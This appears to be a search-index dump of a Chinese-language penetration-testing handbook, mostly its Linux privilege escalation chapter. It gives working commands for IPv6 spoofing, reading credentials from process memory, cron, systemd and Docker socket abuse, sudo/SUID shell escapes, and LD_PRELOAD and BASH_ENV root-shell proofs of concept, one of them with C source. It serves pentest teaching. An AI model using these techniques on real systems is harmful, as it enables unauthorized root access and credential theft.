Privilege Escalation » 进程内存","id":"1389","title":"进程内存"},"139":{"body":"这种攻击与 ARP Spoofing 在 IPv6 环境中非常相似。你可以让受害者认为网关的 IPv6 地址对应的是攻击者的 MAC 地址。 bash sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested\\nsudo fake_advertise6 -r -w 2 eth0 #This option will send the Neighbor Advertisement packet every 2 seconds","breadcrumbs":"Pentesting Network » IPv6 Neighbor Spoofing","id":"139","title":"IPv6 Neighbor Spoofing"},"1390":{"body":"ProcDump 是对 Sysinternals 套件中用于 Windows 的经典 ProcDump 工具在 Linux 上的重新构想。可在以下地址获取: https://github.com/Sysinternals/ProcDump-for-Linux procdump -p 1714 ProcDump v1.2 - Sysinternals process dump utility\\nCopyright (C) 2020 Microsoft Corporation. All rights reserved. Licensed under the MIT license.\\nMark Russinovich, Mario Hewardt, John Salem, Javid Habibi\\nMonitors a process and writes a dump file when the process meets the\\nspecified criteria. Process: sleep (1714)\\nCPU Threshold: n/a\\nCommit Threshold:\\tn/a\\nThread Threshold: n/a\\nFile descriptor Threshold: n/a\\nSignal: n/a\\nPolling interval (ms):\\t1000\\nThreshold (s):\\t10\\nNumber of Dumps:\\t1\\nOutput directory for core dumps:\\t. Press Ctrl-C to end monitoring without terminating the process. [20:20:58 - WARN]: Procdump not running with elevated credentials. If your uid does not match the uid of the target process procdump will not be able to capture memory dumps\\n[20:20:58 - INFO]: Timed:\\n[20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714","breadcrumbs":"Linux Privilege Escalation » ProcDump 用于 linux","id":"1390","title":"ProcDump 用于 linux"},"1391":{"body":"要 dump 进程内存,你可以使用: https://github.com/Sysinternals/ProcDump-for-Linux https://github.com/hajzer/bash-memory-dump (root) - _你可以手动移除 root 要求并 dump 你拥有的进程 Script A.5 来自 https://www.delaat.net/rp/2016-2017/p97/report.pdf (需要 root)","breadcrumbs":"Linux Privilege Escalation » 工具","id":"1391","title":"工具"},"1392":{"body":"手动示例 如果发现 authenticator 进程正在运行: bash ps -ef | grep \\"authenticator\\"\\nroot 2027 2025 0 11:46 ? 00:00:00 authenticator 你可以 dump the process(参见前面的章节以了解 dump the memory of a process 的不同方法),并在 memory 中搜索 credentials: bash ./dump-memory.sh 2027\\nstrings *.dump | grep -i password mimipenguin 该工具 https://github.com/huntergregal/mimipenguin 会 从内存中窃取明文凭证 并从一些 已知文件 中获取凭证。它需要 root 权限才能正常工作。 功能 进程名称 GDM password (Kali Desktop, Debian Desktop) gdm-password Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) gnome-keyring-daemon LightDM (Ubuntu Desktop) lightdm VSFTPd (Active FTP Connections) vsftpd Apache2 (Active HTTP Basic Auth Sessions) apache2 OpenSSH (Active SSH Sessions - Sudo Usage) sshd: 搜索正则/ truffleproc bash # un truffleproc.sh against your current Bash shell (e.g. $$)\\n./truffleproc.sh $$\\n# coredumping pid 6174\\nReading symbols from od...\\nReading symbols from /usr/lib/systemd/systemd...\\nReading symbols from /lib/systemd/libsystemd-shared-247.so...\\nReading symbols from /lib/x86_64-linux-gnu/librt.so.1...\\n[...]\\n# extracting strings to /tmp/tmp.o6HV0Pl3fe\\n# finding secrets\\n# results in /tmp/tmp.o6HV0Pl3fe/results.txt","breadcrumbs":"Linux Privilege Escalation » 从进程内存获取凭证","id":"1392","title":"从进程内存获取凭证"},"1393":{"body":"检查是否有任何计划任务易受攻击。也许你可以利用由 root 执行的脚本(wildcard vuln? 能否修改 root 使用的文件? 使用 symlinks? 在 root 使用的目录中创建特定文件?)。 bash crontab -l\\nls -al /etc/cron* /etc/at*\\ncat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v \\"^#\\"","breadcrumbs":"Linux Privilege Escalation » Scheduled/Cron jobs","id":"1393","title":"Scheduled/Cron jobs"},"1394":{"body":"例如,在 /etc/crontab 你可以找到 PATH: PATH= /home/user :/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin (注意用户 \\"user\\" 对 /home/user 有写权限) 如果在这个 crontab 中 root 用户尝试在不设置 PATH 的情况下执行某个命令或脚本。例如: * * * * root overwrite.sh 那么,你可以通过以下方式获得 root shell: bash echo \'cp /bin/bash /tmp/bash; chmod +s /tmp/bash\' > /home/user/overwrite.sh\\n#Wait cron job to be executed\\n/tmp/bash -p #The effective uid and gid to be set to the real uid and gid","breadcrumbs":"Linux Privilege Escalation » Cron 路径","id":"1394","title":"Cron 路径"},"1395":{"body":"如果一个由 root 执行的脚本在命令中包含 “ * ”,你可以利用这一点导致意想不到的结果(比如 privesc)。示例: bash rsync -a *.sh rsync://host.back/src/rbd #You can create a file called \\"-e sh myscript.sh\\" so the script will execute our script 如果通配符前面有路径比如 /some/path/ * ,就不会受到影响(即使 ./ * 也不)。 阅读以下页面以获取更多通配符利用技巧: Wildcards Spare tricks","breadcrumbs":"Linux Privilege Escalation » Cron 使用带通配符的脚本 (Wildcard Injection)","id":"1395","title":"Cron 使用带通配符的脚本 (Wildcard Injection)"},"1396":{"body":"Bash 在 ((...)), $((...)) 和 let 中进行算术求值之前会执行 parameter expansion 和 command substitution。如果 root cron/parser 读取不受信任的日志字段并将其传入算术上下文,攻击者可以注入一个 command substitution $(...),当 cron 运行时以 root 身份执行。 Why it works: 在 Bash 中,expansions 按如下顺序发生:parameter/variable expansion、command substitution、arithmetic expansion,然后是 word splitting 和 pathname expansion。所以像 $(/bin/bash -c \'id > /tmp/pwn\')0 这样的值会先被替换(运行该命令),之后剩下的数字 0 会用于算术运算,从而使脚本继续而不会报错。 典型的易受攻击的模式: bash #!/bin/bash\\n# Example: parse a log and \\"sum\\" a count field coming from the log\\nwhile IFS=\',\' read -r ts user count rest; do\\n# count is untrusted if the log is attacker-controlled\\n(( total += count )) # or: let \\"n=$count\\"\\ndone < /var/www/app/log/application.log Exploitation: 让攻击者控制的文本写入被解析的日志,使看起来像数字的字段包含 command substitution 并以数字结尾。确保你的命令不要向 stdout 输出(或将其重定向),以便算术表达式保持有效。 bash # Injected field value inside the log (e.g., via a crafted HTTP request that the app logs verbatim):\\n$(/bin/bash -c \'cp /bin/bash /tmp/sh; chmod +s /tmp/sh\')0\\n# When the root cron parser evaluates (( total += count )), your command runs as root.","breadcrumbs":"Linux Privilege Escalation » Bash arithmetic expansion injection in cron log parsers","id":"1396","title":"Bash arithmetic expansion injection in cron log parsers"},"1397":{"body":"如果你 可以修改 cron script (由 root 执行),可以非常容易地获得一个 shell: bash echo \'cp /bin/bash /tmp/bash; chmod +s /tmp/bash\' > \\n#Wait until it is executed\\n/tmp/bash -p 如果由 root 执行的脚本使用一个 你拥有完全访问权限的目录 ,那么删除该目录并 创建一个指向另一个由你控制并提供脚本的 symlink 目录 可能会很有用。 bash ln -d -s ","breadcrumbs":"Linux Privilege Escalation » Cron script overwriting and symlink","id":"1397","title":"Cron script overwriting and symlink"},"1398":{"body":"你可以监视进程,查找每隔 1、2 或 5 分钟执行的进程。也许你可以利用它并 escalate privileges。 例如,要 在 1 分钟内每 0.1s 监控 、 按执行次数最少排序 并删除被执行次数最多的命令,你可以做: bash for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v \\"\\\\[\\" | sed \'/^.\\\\{200\\\\}./d\' | sort | grep -E -v \\"\\\\s*[6-9][0-9][0-9]|\\\\s*[0-9][0-9][0-9][0-9]\\"; rm /tmp/monprocs.tmp; 你也可以使用 pspy (它会监视并列出每个启动的进程)。","breadcrumbs":"Linux Privilege Escalation » 频繁的 cron jobs","id":"1398","title":"频繁的 cron jobs"},"1399":{"body":"可以创建一个 cronjob,通过 在注释后放置回车符 (没有换行字符),使该 cron job 生效。示例(注意回车字符): bash #This is a comment inside a cron config file\\\\r* * * * * echo \\"Surprise!\\"","breadcrumbs":"Linux Privilege Escalation » 隐形 cron jobs","id":"1399","title":"隐形 cron jobs"},"14":{"body":"Last Tower Solutions 提供专门的网络安全服务,面向 教育 和 金融科技 机构,重点关注 渗透测试、云安全评估 和 合规准备 (SOC 2、PCI-DSS、NIST)。我们的团队包括 OSCP 和 CISSP 认证专业人员 ,为每次合作带来深厚的技术专长和行业标准的见解。 我们超越自动化扫描,提供 手动、基于情报的测试 ,针对高风险环境量身定制。从保护学生记录到保护金融交易,我们帮助组织捍卫最重要的事务。 “高质量的防御需要了解进攻,我们通过理解提供安全。” 通过访问我们的 博客 了解网络安全的最新动态。 Last Tower Solutions | Cybersecurity Consulting for Educational Institutions","breadcrumbs":"HackTricks » Last Tower Solutions","id":"14","title":"Last Tower Solutions"},"140":{"body":"一些 OS 默认会根据网络中发送的 RA 数据包配置网关。要将攻击者声明为 IPv6 router,你可以使用: bash sysctl -w net.ipv6.conf.all.forwarding=1 4\\nip route add default via dev wlan0\\nfake_router6 wlan0 fe80::01/16","breadcrumbs":"Pentesting Network » IPv6 Router Advertisement Spoofing/Flooding","id":"140","title":"IPv6 Router Advertisement Spoofing/Flooding"},"1400":{"body":"","breadcrumbs":"Linux Privilege Escalation » 服务","id":"1400","title":"服务"},"1401":{"body":"检查是否可以写入任何 .service 文件。如果可以,你 可以修改它 ,使其在服务 启动 、 重启 或 停止 时 执行 你的 backdoor (可能需要等到机器重启)。 例如,在 .service 文件中创建你的 backdoor,使用 ExecStart=/tmp/script.sh","breadcrumbs":"Linux Privilege Escalation » 可写的 .service 文件","id":"1401","title":"可写的 .service 文件"},"1402":{"body":"请记住,如果你对由服务执行的二进制文件具有 写权限 ,你可以将它们更改为 backdoors,这样当服务被重新执行时,backdoors 就会被执行。","breadcrumbs":"Linux Privilege Escalation » 可写的服务二进制文件","id":"1402","title":"可写的服务二进制文件"},"1403":{"body":"你可以通过以下方式查看 systemd 使用的 PATH: bash systemctl show-environment 如果你发现可以在该路径的任一文件夹中 write ,你可能能够 escalate privileges 。你需要搜索在服务配置文件中使用的 相对路径 ,例如: bash ExecStart=faraday-server\\nExecStart=/bin/sh -ec \'ifup --allow=hotplug %I; ifquery --state %I\'\\nExecStop=/bin/sh \\"uptux-vuln-bin3 -stuff -hello\\" 然后,在你可写入的 systemd PATH folder 中创建一个与相对路径二进制文件同名的 executable ,当服务被要求执行易受攻击的操作( Start 、 Stop 、 Reload )时,你的 backdoor 将被执行(非特权用户通常无法 start/stop services,但检查是否可以使用 sudo -l)。 Learn more about services with man systemd.service.","breadcrumbs":"Linux Privilege Escalation » systemd PATH - 相对路径","id":"1403","title":"systemd PATH - 相对路径"},"1404":{"body":"Timers 是 systemd 的 unit 文件,名称以 **.timer** 结尾,用于控制 **.service** 文件或事件。Timers 可以作为 cron 的替代,因为它们内建对日历时间事件 (calendar time events) 和单调时间事件 (monotonic time events) 的支持,并且可以异步运行。 You can enumerate all the timers with: bash systemctl list-timers --all","breadcrumbs":"Linux Privilege Escalation » Timers","id":"1404","title":"Timers"},"1405":{"body":"如果你可以修改一个 timer,你可以让它执行一些 systemd.unit 的现有项(比如 .service 或 .target) bash Unit=backdoor.service 在文档中可以看到 Unit 是什么: 在该 timer 到期时要激活的 unit。参数是一个 unit name,其后缀不是 \\".timer\\"。如果未指定,该值默认为一个 service,其名称与 timer unit 相同,但后缀不同。(见上文。)建议被激活的 unit name 与 timer unit 的 unit name 除后缀外保持一致。 因此,要滥用此权限,你需要: 找到某个 systemd unit(例如 .service),它正在 执行一个可写的 binary 找到某个 systemd unit,它正在 执行一个相对路径 ,并且你对 systemd PATH 拥有 writable privileges (以冒充该可执行文件) 使用 man systemd.timer 了解有关 timers 的更多信息。","breadcrumbs":"Linux Privilege Escalation » 可写的 timer","id":"1405","title":"可写的 timer"},"1406":{"body":"要启用 timer,你需要 root 权限并执行: bash sudo systemctl enable backu2.timer\\nCreated symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer. 注意, timer 是通过在 /etc/systemd/system/.wants/.timer 上创建一个符号链接来 激活 的。","breadcrumbs":"Linux Privilege Escalation » 启用 Timer","id":"1406","title":"启用 Timer"},"1407":{"body":"Unix Domain Sockets (UDS) 在客户端-服务器模型中允许在同一台或不同机器上进行 进程间通信 。它们使用标准 Unix 描述符文件进行主机间通信,并通过 .socket 文件进行配置。 套接字可以使用 .socket 文件进行配置。 使用 man systemd.socket 了解更多关于套接字的信息。 在此文件中,可以配置多个有趣的参数: ListenStream, ListenDatagram, ListenSequentialPacket, ListenFIFO, ListenSpecial, ListenNetlink, ListenMessageQueue, ListenUSBFunction: 这些选项各不相同,但总体上用于 指示将在哪里监听 该套接字(AF_UNIX 套接字文件的路径、要监听的 IPv4/6 和/或端口号等)。 Accept: 接受一个 boolean 参数。如果 true ,则会为每个传入连接生成一个 service 实例 ,并且仅将连接套接字传递给它。如果 false ,所有监听套接字本身将 传递给启动的 service 单元 ,并且只为所有连接生成一个 service 单元。对于 datagram 套接字和 FIFOs,此值被忽略,在那里单个 service 单元无条件处理所有传入流量。 默认值为 false 。出于性能原因,建议在编写新的 daemon 时以适合 Accept=no 的方式编写。 ExecStartPre, ExecStartPost: 接受一个或多个命令行,在监听的 套接字 /FIFOs 分别被 创建 并绑定之前或之后 执行 。命令行的第一个词元必须是绝对文件名,随后是进程的参数。 ExecStopPre, ExecStopPost: 额外的 命令 ,在监听的 套接字 /FIFOs 分别被 关闭 并移除之前或之后 执行 。 Service: 指定在 传入流量 时要 激活 的 service 单元名称。此设置仅允许用于 Accept=no 的套接字。默认使用与套接字同名(替换后缀)的 service。在大多数情况下,不需要使用此选项。","breadcrumbs":"Linux Privilege Escalation » 套接字","id":"1407","title":"套接字"},"1408":{"body":"如果你发现一个 可写 的 .socket 文件,你可以在 [Socket] 部分的开头 添加 类似 ExecStartPre=/home/kali/sys/backdoor 的内容,backdoor 将在套接字被创建之前执行。因此,你 可能需要等待机器重启。 Note that the system must be using that socket file configuration or the backdoor won\'t be executed","breadcrumbs":"Linux Privilege Escalation » 可写的 .socket 文件","id":"1408","title":"可写的 .socket 文件"},"1409":{"body":"如果你 发现任何可写的套接字 ( 这里我们指的是 Unix Sockets,而不是配置的 .socket 文件 ),那么 你可以与该套接字进行通信 ,并可能利用其中的漏洞。","breadcrumbs":"Linux Privilege Escalation » 可写的套接字","id":"1409","title":"可写的套接字"},"141":{"body":"默认情况下,一些 OS 会尝试通过读取网络中的 DHCPv6 包来配置 DNS。然后,攻击者可以发送 DHCPv6 包,将自己配置为 DNS。DHCP 也会为受害者提供 IPv6 地址。 bash dhcp6.spoof on\\ndhcp6.spoof.domains mitm6","breadcrumbs":"Pentesting Network » IPv6 DHCP spoofing","id":"141","title":"IPv6 DHCP spoofing"},"1410":{"body":"bash netstat -a -p --unix","breadcrumbs":"Linux Privilege Escalation » 枚举 Unix 套接字","id":"1410","title":"枚举 Unix 套接字"},"1411":{"body":"bash #apt-get install netcat-openbsd\\nnc -U /tmp/socket #Connect to UNIX-domain stream socket\\nnc -uU /tmp/socket #Connect to UNIX-domain datagram socket #apt-get install socat\\nsocat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type 利用示例: Socket Command Injection","breadcrumbs":"Linux Privilege Escalation » 原始连接","id":"1411","title":"原始连接"},"1412":{"body":"注意,可能存在一些用于监听 HTTP 请求的 sockets( 我不是指 .socket 文件,而是作为 unix sockets 的文件 )。你可以用下面的命令检查: bash curl --max-time 2 --unix-socket /pat/to/socket/files http:/index 如果该 socket 对 HTTP 请求有响应 ,那么你可以 与其通信 ,并且可能 利用某些漏洞 。","breadcrumbs":"Linux Privilege Escalation » HTTP sockets","id":"1412","title":"HTTP sockets"},"1413":{"body":"Docker socket,通常位于 /var/run/docker.sock,是一个需要保护的重要文件。默认情况下,它对 root 用户和 docker 组的成员可写。拥有对该 socket 的写权限可能导致权限提升。下面是如何实现以及在无法使用 Docker CLI 时的替代方法的分解说明。 Privilege Escalation with Docker CLI 如果你对 Docker socket 拥有写权限,你可以使用以下命令提升权限: bash docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash\\ndocker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh 这些命令允许你运行一个容器,从而以 root 权限访问宿主机文件系统。 Using Docker API Directly 在 Docker CLI 不可用的情况下,仍可以使用 Docker API 和 curl 命令操作 Docker socket。 List Docker Images: 检索可用镜像列表。 bash curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json Create a Container: 发送请求创建一个挂载宿主机根目录的容器。 bash curl -XPOST -H \\"Content-Type: application/json\\" --unix-socket /var/run/docker.sock -d \'{\\"Image\\":\\"\\",\\"Cmd\\":[\\"/bin/sh\\"],\\"DetachKeys\\":\\"Ctrl-p,Ctrl-q\\",\\"OpenStdin\\":true,\\"Mounts\\":[{\\"Type\\":\\"bind\\",\\"Source\\":\\"/\\",\\"Target\\":\\"/host_root\\"}]}\' http://localhost/containers/create Start the newly created container: bash curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start Attach to the Container: 使用 socat 建立与容器的连接,从而可以在其中执行命令。 bash socat - UNIX-CONNECT:/var/run/docker.sock\\nPOST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1\\nHost:\\nConnection: Upgrade\\nUpgrade: tcp 在建立 socat 连接后,你可以直接在容器内执行命令,并以 root 级别访问宿主机的文件系统。","breadcrumbs":"Linux Privilege Escalation » 可写的 Docker Socket","id":"1413","title":"可写的 Docker Socket"},"1414":{"body":"注意,如果你对 docker socket 有写权限,因为你位于组 docker 内,你将有 更多提权方式 。如果 docker API 在端口监听 ,你也可能能够攻破它 。 在以下位置查看 更多从 docker 逃逸或滥用以提权的方法 : Docker Security","breadcrumbs":"Linux Privilege Escalation » Others","id":"1414","title":"Others"},"1415":{"body":"如果你发现可以使用 ctr 命令,请阅读以下页面, 因为你可能能够滥用它来提权 : Containerd (ctr) Privilege Escalation","breadcrumbs":"Linux Privilege Escalation » Containerd (ctr) 提权","id":"1415","title":"Containerd (ctr) 提权"},"1416":{"body":"如果你发现可以使用 runc 命令,请阅读以下页面, 因为你可能能够滥用它来提权 : RunC Privilege Escalation","breadcrumbs":"Linux Privilege Escalation » RunC 提权","id":"1416","title":"RunC 提权"},"1417":{"body":"D-Bus 是一个复杂的进程间通信 (IPC) 系统,允许应用程序高效地交互和共享数据。它为现代 Linux 系统设计,提供了一个用于不同形式应用间通信的稳健框架。 该系统功能多样,支持增强进程间数据交换的基本 IPC,类似于增强版的 UNIX 域套接字。此外,它有助于广播事件或信号,促进系统组件之间的无缝集成。例如,Bluetooth 守护进程关于来电的信号可以促使音乐播放器静音,以改善用户体验。另一个方面,D-Bus 支持远程对象系统,简化了应用程序之间的服务请求和方法调用,优化了传统上较为复杂的流程。 D-Bus 基于允许/拒绝模型运行,基于匹配策略规则的累积效果来管理消息权限(方法调用、信号发射等)。这些策略指定了与总线的交互,可能通过滥用这些权限导致提权。 在 /etc/dbus-1/system.d/wpa_supplicant.conf 中提供了这样的策略示例,详细说明了 root 用户拥有、发送给和接收来自 fi.w1.wpa_supplicant1 的消息的权限。 未指定用户或组的策略普遍适用,而“default”上下文策略适用于所有未被其他特定策略覆盖的情况。 xml \\n\\n\\n\\n\\n 在这里学习如何对 D-Bus 通信进行 enumerate 和 exploit: D-Bus Enumeration & Command Injection Privilege Escalation","breadcrumbs":"Linux Privilege Escalation » D-Bus","id":"1417","title":"D-Bus"},"1418":{"body":"通常值得对网络进行 enumerate 并弄清主机的位置。","breadcrumbs":"Linux Privilege Escalation » 网络","id":"1418","title":"网络"},"1419":{"body":"bash #Hostname, hosts and DNS\\ncat /etc/hostname /etc/hosts /etc/resolv.conf\\ndnsdomainname #Content of /etc/inetd.conf & /etc/xinetd.conf\\ncat /etc/inetd.conf /etc/xinetd.conf #Interfaces\\ncat /etc/networks\\n(ifconfig || ip a) #Neighbours\\n(arp -e || arp -a)\\n(route || ip n) #Iptables rules\\n(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v \\"^#\\" | grep -Pv \\"\\\\W*\\\\#\\" 2>/dev/null) #Files used by network services\\nlsof -i","breadcrumbs":"Linux Privilege Escalation » 通用 enumeration","id":"1419","title":"通用 enumeration"},"142":{"body":"","breadcrumbs":"Pentesting Network » HTTP (fake page and JS code injection)","id":"142","title":"HTTP (fake page and JS code injection)"},"1420":{"body":"在访问机器之前,始终检查在该机器上运行但你之前无法与之交互的网络服务: bash (netstat -punta || ss --ntpu)\\n(netstat -punta || ss --ntpu) | grep \\"127.0\\"","breadcrumbs":"Linux Privilege Escalation » 开放端口","id":"1420","title":"开放端口"},"1421":{"body":"检查是否能 sniff traffic。 如果可以,你可能能够获取一些 credentials。 timeout 1 tcpdump","breadcrumbs":"Linux Privilege Escalation » Sniffing","id":"1421","title":"Sniffing"},"1422":{"body":"","breadcrumbs":"Linux Privilege Escalation » 用户","id":"1422","title":"用户"},"1423":{"body":"检查你是 who ,你拥有哪些 privileges ,系统中有哪些 users ,哪些可以 login ,以及哪些拥有 root privileges : bash #Info about me\\nid || (whoami && groups) 2>/dev/null\\n#List all users\\ncat /etc/passwd | cut -d: -f1\\n#List users with console\\ncat /etc/passwd | grep \\"sh$\\"\\n#List superusers\\nawk -F: \'($3 == \\"0\\") {print}\' /etc/passwd\\n#Currently logged users\\nw\\n#Login history\\nlast | tail\\n#Last log of each user\\nlastlog #List all users and their groups\\nfor i in $(cut -d\\":\\" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort\\n#Current user PGP keys\\ngpg --list-keys 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 通用枚举","id":"1423","title":"通用枚举"},"1424":{"body":"某些 Linux 版本受到一个漏洞影响,允许具有 UID > INT_MAX 的用户提权。More info: here , here and here . 利用它 使用: systemd-run -t /bin/bash","breadcrumbs":"Linux Privilege Escalation » Big UID","id":"1424","title":"Big UID"},"1425":{"body":"检查你是否是可能授予你 root 权限的 某个组的成员 : Interesting Groups - Linux Privesc","breadcrumbs":"Linux Privilege Escalation » Groups","id":"1425","title":"Groups"},"1426":{"body":"检查剪贴板中是否有任何有趣的内容(如果可能) bash if [ `which xclip 2>/dev/null` ]; then\\necho \\"Clipboard: \\"`xclip -o -selection clipboard 2>/dev/null`\\necho \\"Highlighted text: \\"`xclip -o 2>/dev/null`\\nelif [ `which xsel 2>/dev/null` ]; then\\necho \\"Clipboard: \\"`xsel -ob 2>/dev/null`\\necho \\"Highlighted text: \\"`xsel -o 2>/dev/null`\\nelse echo \\"Not found xsel and xclip\\"\\nfi","breadcrumbs":"Linux Privilege Escalation » Clipboard","id":"1426","title":"Clipboard"},"1427":{"body":"bash grep \\"^PASS_MAX_DAYS\\\\|^PASS_MIN_DAYS\\\\|^PASS_WARN_AGE\\\\|^ENCRYPT_METHOD\\" /etc/login.defs","breadcrumbs":"Linux Privilege Escalation » 密码策略","id":"1427","title":"密码策略"},"1428":{"body":"如果你 知道环境中任何密码 ,请 尝试使用该密码登录每个用户 。","breadcrumbs":"Linux Privilege Escalation » 已知密码","id":"1428","title":"已知密码"},"1429":{"body":"如果你不介意产生大量噪音并且系统上存在 su 和 timeout 二进制文件,你可以尝试使用 su-bruteforce 。 Linpeas 使用 -a 参数也会尝试对用户进行暴力破解。","breadcrumbs":"Linux Privilege Escalation » Su Brute","id":"1429","title":"Su Brute"},"143":{"body":"","breadcrumbs":"Pentesting Network » 互联网攻击","id":"143","title":"互联网攻击"},"1430":{"body":"","breadcrumbs":"Linux Privilege Escalation » 可写的 $PATH 滥用","id":"1430","title":"可写的 $PATH 滥用"},"1431":{"body":"如果你发现你可以 在 $PATH 的某个文件夹中写入 ,你可能能够通过 在可写文件夹中创建 backdoor ,并将其命名为某个将由其他用户(理想情况下为 root)执行的命令,从而提升权限,前提是该命令 不会从位于你的可写文件夹之前的文件夹加载 。","breadcrumbs":"Linux Privilege Escalation » $PATH","id":"1431","title":"$PATH"},"1432":{"body":"你可能被允许使用 sudo 执行某些命令,或者某些命令可能设置了 suid 位。使用以下命令检查: bash sudo -l #Check commands you can execute with sudo\\nfind / -perm -4000 2>/dev/null #Find all SUID binaries 一些 意想不到的 commands 允许你读取和/或写入 files 或甚至执行命令。 例如: bash sudo awk \'BEGIN {system(\\"/bin/sh\\")}\'\\nsudo find /etc -exec sh -i \\\\;\\nsudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh\\nsudo tar c a.tar -I ./runme.sh a\\nftp>!/bin/sh\\nless>! ","breadcrumbs":"Linux Privilege Escalation » SUDO and SUID","id":"1432","title":"SUDO and SUID"},"1433":{"body":"Sudo 配置可能允许用户在不知晓密码的情况下,以另一个用户的权限执行某些命令。 $ sudo -l\\nUser demo may run the following commands on crashlab:\\n(root) NOPASSWD: /usr/bin/vim 在这个例子中,用户 demo 可以以 root 身份运行 vim,现在通过将 ssh key 添加到 root 目录或调用 sh 来获得 shell 非常简单。 sudo vim -c \'!sh\'","breadcrumbs":"Linux Privilege Escalation » NOPASSWD","id":"1433","title":"NOPASSWD"},"1434":{"body":"此指令允许用户在执行某些操作时 设置环境变量 : bash $ sudo -l\\nUser waldo may run the following commands on admirer:\\n(ALL) SETENV: /opt/scripts/admin_tasks.sh 这个示例, 基于 HTB machine Admirer , 存在漏洞 ,可通过 PYTHONPATH hijacking 在以 root 身份执行脚本时加载任意 python library: bash sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh","breadcrumbs":"Linux Privilege Escalation » SETENV","id":"1434","title":"SETENV"},"1435":{"body":"如果 sudoers 保留了 BASH_ENV(例如 Defaults env_keep+=\\"ENV BASH_ENV\\"),你可以利用 Bash 的非交互式启动行为,在调用被允许的命令时以 root 身份运行任意代码。 Why it works: 对于非交互式 shell,Bash 会在运行目标脚本之前评估 $BASH_ENV 并加载执行该文件。许多 sudo 规则允许运行脚本或 shell 包装器。如果 sudo 保留了 BASH_ENV,你的文件就会以 root 权限被执行。 Requirements: 一个你可以运行的 sudo 规则(任何以非交互方式调用 /bin/bash 的目标,或任何 bash 脚本)。 BASH_ENV 出现在 env_keep 中(可用 sudo -l 检查)。 PoC: bash cat > /dev/shm/shell.sh <<\'EOF\'\\n#!/bin/bash\\n/bin/bash\\nEOF\\nchmod +x /dev/shm/shell.sh\\nBASH_ENV=/dev/shm/shell.sh sudo /usr/bin/systeminfo # or any permitted script/binary that triggers bash\\n# You should now have a root shell 加固: 从 env_keep 中移除 BASH_ENV(和 ENV),优先使用 env_reset。 避免为允许 sudo 的命令使用 shell 包装器;尽量使用最小化的二进制文件。 当保留的环境变量被使用时,考虑对 sudo 的 I/O 进行日志记录与告警。","breadcrumbs":"Linux Privilege Escalation » BASH_ENV preserved via sudo env_keep → root shell","id":"1435","title":"BASH_ENV preserved via sudo env_keep → root shell"},"1436":{"body":"Jump 跳转以阅读其他文件或使用 symlinks 。例如在 sudoers 文件中: hacker10 ALL= (root) /bin/less /var/log/* bash sudo less /var/logs/anything\\nless>:e /etc/shadow #Jump to read other files using privileged less bash ln /etc/shadow /var/log/new\\nsudo less /var/log/new #Use symlinks to read any file 如果使用 wildcard (*),就更容易: bash sudo less /var/log/../../etc/shadow #Read shadow\\nsudo less /var/log/something /etc/shadow #Red 2 files 缓解措施 : https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/","breadcrumbs":"Linux Privilege Escalation » Sudo 执行绕过路径","id":"1436","title":"Sudo 执行绕过路径"},"1437":{"body":"如果将 sudo 权限 授予单个命令且 未指定路径 : hacker10 ALL= (root) less ,你可以通过更改 PATH 变量来利用它 bash export PATH=/tmp:$PATH\\n#Put your backdoor in /tmp and name it \\"less\\"\\nsudo less 此技术也可用于当一个 suid binary 在不指定路径的情况下执行另一个命令(始终使用 strings 检查可疑的 SUID binary 的内容) 。 Payload examples to execute.","breadcrumbs":"Linux Privilege Escalation » Sudo command/SUID binary 未指定命令路径","id":"1437","title":"Sudo command/SUID binary 未指定命令路径"},"1438":{"body":"如果 suid binary 执行另一个指定了路径的命令 ,则可以尝试 导出一个函数 ,其名称与 suid 文件所调用的命令相同。 例如,如果一个 suid binary 调用 /usr/sbin/service apache2 start ,你需要尝试创建该函数并导出: bash function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }\\nexport -f /usr/sbin/service Then, when you call the suid binary, this function will be executed","breadcrumbs":"Linux Privilege Escalation » SUID binary 带命令路径","id":"1438","title":"SUID binary 带命令路径"},"1439":{"body":"环境变量 LD_PRELOAD 用来指定一个或多个共享库(.so 文件),由加载器在其他库之前载入,包括标准 C 库(libc.so)。这个过程称为预加载库。 但是,为了维护系统安全并防止此功能被滥用,尤其是在 suid/sgid 可执行文件上,系统施加了某些限制: 对于 real user ID ( ruid ) 与 effective user ID ( euid ) 不匹配的可执行文件,加载器会忽略 LD_PRELOAD 。 对于带有 suid/sgid 的可执行文件,只有位于标准路径且自身也是 suid/sgid 的库会被预加载。 如果你能够使用 sudo 执行命令,且 sudo -l 的输出包含 env_keep+=LD_PRELOAD ,则可能发生特权提升。这个配置允许 LD_PRELOAD 环境变量在使用 sudo 运行命令时仍然保留并被识别,从而可能导致以提升的权限执行任意代码。 Defaults env_keep += LD_PRELOAD 保存为 /tmp/pe.c c #include \\n#include \\n#include void _init() {\\nunsetenv(\\"LD_PRELOAD\\");\\nsetgid(0);\\nsetuid(0);\\nsystem(\\"/bin/bash\\");\\n} 然后使用以下命令来 编译它 : bash cd /tmp\\ngcc -fPIC -shared -o pe.so pe.c -nostartfiles 最后,运行 escalate privileges bash sudo LD_PRELOAD=./pe.so #Use any command you can run with sudo caution 如果攻击者能控制 